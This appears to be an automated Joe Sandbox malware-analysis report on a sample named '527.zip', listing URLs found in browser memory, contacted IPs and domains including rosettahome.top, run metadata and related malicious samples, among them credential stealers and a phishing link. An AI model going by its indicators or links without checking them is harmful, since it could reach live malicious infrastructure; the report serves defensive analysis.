                                                                                                                                                http://exslt.org/commonfirefox.exe, 00000003.00000003.1666117463.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1439458960.000001CA7F193000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1694765742.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1621499602.000001CA7F1A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullScfirefox.exe, 00000003.00000003.1532015226.000001CA1B442000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/idfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestionsfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://mozilla.org/#/properties/branches/anyOf/0/items/properties/featurefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://MD8.mozilla.org/1/mfirefox.exe, 00000003.00000003.1674522956.000001CA0EEC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://mozilla.org/#/properties/enabledfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabledfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://addons.mozilla.org/firefox/addon/to-google-translate/firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://bugzilla.mofirefox.exe, 00000003.00000003.1528006163.000001CA1B1EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://mitmdetection.services.mozilla.com/firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://shavar.services.mozilla.com/firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://identity.mozilla.com/ids/ecosystem_telemetrynotfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://spocs.getpocket.com/firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://mozilla.org/#/properties/endDatefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://mozilla.org/#/properties/addonsFeatureGatefirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://mozilla.org/#/properties/addonsShowLessFrequentlyCapfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabledfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-firefox.exe, 00000003.00000003.1822094452.000001CA0C047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1798915283.000001CA198CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://mozilla.org/#/properties/enrollmentEndDatefirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://login.microsoftonline.comfirefox.exe, 00000003.00000003.1671012859.000001CA154DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1677981793.000001CA0EA4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://x1.c.lencr.org/0firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://x1.i.lencr.org/0firefox.exe, 00000003.00000003.1603987810.000001CA19C38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1480638505.000001CA0B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1682450384.000001CA19C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000003.00000003.1479097899.000001CA157DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnoredfirefox.exe, 00000003.00000003.1628297834.000001CA1B43E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://mozilla.org/#/properties/outcomesfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://www.urwpp.defirefox.exe, 00000003.00000003.2043753666.000001CA7CF8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://identity.mozilla.com/apps/relayfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://mozilla.org/03xfirefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2firefox.exe, 00000003.00000003.1720770465.000001CA13657000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000003.00000003.2023659253.000001CA08592000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://screenshots.firefox.com/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017734041.000001CA0B145000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://truecolors.firefox.com/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/adfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://json-schema.org/draft-07/schema#-firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxfirefox.exe, 00000003.00000003.2018426889.000001CA0B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1649243278.000001CA1959A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://mozilla.org/#/properties/dnsMaxAnyPriorityThreadsfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          http://mozilla.org/Zfirefox.exe, 00000003.00000003.1915582603.000025D898603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1919592458.00003B7B7EB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773377124.00003D30A6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1770413347.0000331419603000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://support.mozilla.org/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratiofirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                    https://watch.sling.com/firefox.exe, 00000003.00000003.1710654212.000001CA0EB0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                                      https://github.com/google/closure-compiler/issues/3177firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                                        http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialogfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                                          https://monitor.firefox.com/firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                                            https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElemfirefox.exe, 00000003.00000003.1532015226.000001CA1B447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                                              https://webextensions.settings.services.mozilla.com/v1firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                                https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.tsfirefox.exe, 00000003.00000003.1484724664.000001CA155CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                                  http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsfirefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                                    https://identity.mozilla.com/apps/oldsyncfirefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                    http://json-schema.org/draft-06/schema#firefox.exe, 00000003.00000003.1676028783.000001CA0EEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                      151.101.129.91
                                                                                                                                                                                                                                                                      		services.addons.mozilla.orgUnited States
                                                                                                                                                                                                                                                                      		54113FASTLYUSfalse
                                                                                                                                                                                                                                                                      216.58.206.36
                                                                                                                                                                                                                                                                      		www.google.comUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      34.117.188.166
                                                                                                                                                                                                                                                                      		contile.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                      		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                      35.201.103.21
                                                                                                                                                                                                                                                                      		normandy-cdn.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      34.120.208.123
                                                                                                                                                                                                                                                                      		telemetry-incoming.r53-2.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      34.149.100.209
                                                                                                                                                                                                                                                                      		prod.remote-settings.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                      		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                                      34.107.243.93
                                                                                                                                                                                                                                                                      		push.services.mozilla.comUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      208.68.240.115
                                                                                                                                                                                                                                                                      		boinc.berkeley.eduUnited States
                                                                                                                                                                                                                                                                      		25UCBUSfalse
                                                                                                                                                                                                                                                                      34.107.221.82
                                                                                                                                                                                                                                                                      		prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      35.244.181.201
                                                                                                                                                                                                                                                                      		prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                                      		unknownReserved
                                                                                                                                                                                                                                                                      		unknownunknownfalse
                                                                                                                                                                                                                                                                      104.238.61.8
                                                                                                                                                                                                                                                                      		rosettahome.topUnited States
                                                                                                                                                                                                                                                                      		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                                                                                                                                                      35.190.72.216
                                                                                                                                                                                                                                                                      		prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                      34.160.144.191
                                                                                                                                                                                                                                                                      		prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                      		2686ATGS-MMD-ASUSfalse

                                                                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                      192.168.2.17
                                                                                                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                                                                                                      192.168.2.13
                                                                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                                                      Analysis ID:1591248
                                                                                                                                                                                                                                                                      Start date and time:2025-01-14 20:44:28 +01:00
                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                      Overall analysis duration:0h 9m 3s
                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:39
                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                      Sample name:527.zip
                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                      Classification:mal80.evad.winZIP@59/102@76/18
                                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                                      • Successful, ratio: 60%
                                                                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                                      • Found application associated with file extension: .zip

                                                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.206, 66.102.1.84, 142.250.186.46, 142.250.181.238, 142.250.184.195, 142.250.186.42, 142.250.185.138, 142.250.185.170, 142.250.184.202, 142.250.186.170, 142.250.74.202, 142.250.186.74, 142.250.186.138, 142.250.185.202, 172.217.18.106, 142.250.186.106, 142.250.185.234, 216.58.206.42, 142.250.181.234, 172.217.23.106, 172.217.16.138, 142.250.184.206, 44.233.129.8, 52.41.23.50, 44.242.27.200, 142.250.185.174, 172.217.16.202, 172.217.16.206, 142.250.186.78, 2.22.61.59, 2.22.61.56, 172.217.18.14, 142.250.185.131, 216.58.206.46, 142.250.184.238, 142.250.185.238, 216.58.212.174, 172.217.18.110, 216.58.206.78, 52.149.20.212, 204.79.197.200, 23.1.33.206, 40.126.31.73, 51.104.15.253, 204.79.197.222, 150.171.84.254, 13.107.246.254
                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fp.msedge.net, p-ring.msedge.net, ciscobinary.openh264.org, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, redirector.gvt1.com, login.live.com, r.bing.com, update.googleapis.com, safebrowsing.googleapis.com, www.gstatic.com, clients1.google.com, www.bing.com, shavar.prod.mozaws.net, accounts.google.com, ogads-pa.googleapis.com, detectportal.prod.mozaws.net, t-ring.msedge.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, location.services.mozilla.com, browser.pipe.aria.microsoft.com
                                                                                                                                                                                                                                                                      • Execution Graph export aborted for target firefox.exe, PID 876 because there are no executed function
                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                                      14:45:16API Interceptor1x Sleep call for process: firefox.exe modified
                                                                                                                                                                                                                                                                      14:45:39API Interceptor154x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                      14:46:31API Interceptor17x Sleep call for process: .exe modified

                                                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      34.117.188.166random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                        random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                          rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                            rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                              ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                  NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                    nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                      nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                          34.149.100.209random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                              rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                  https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                    ReJIL-_Document_No._2500015903.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                        NetFxRepairTools.msiGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                          nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                            nM0h824cc3.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                              151.101.129.91https://deltacapoffers.com/prequalification.php?utm_source=klayvio&utm_medium=email&utm_campaign=scrapeddripcampaign&utm_id=efi&utm_term=efi&utm_content=scrapedlists6&_kx=YFJgSt5YAM6jpJldJ4ZDop7CB1jVRJhqJKw59Uk4HMU.QZibAuGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  random.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                    rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                      fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                        LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
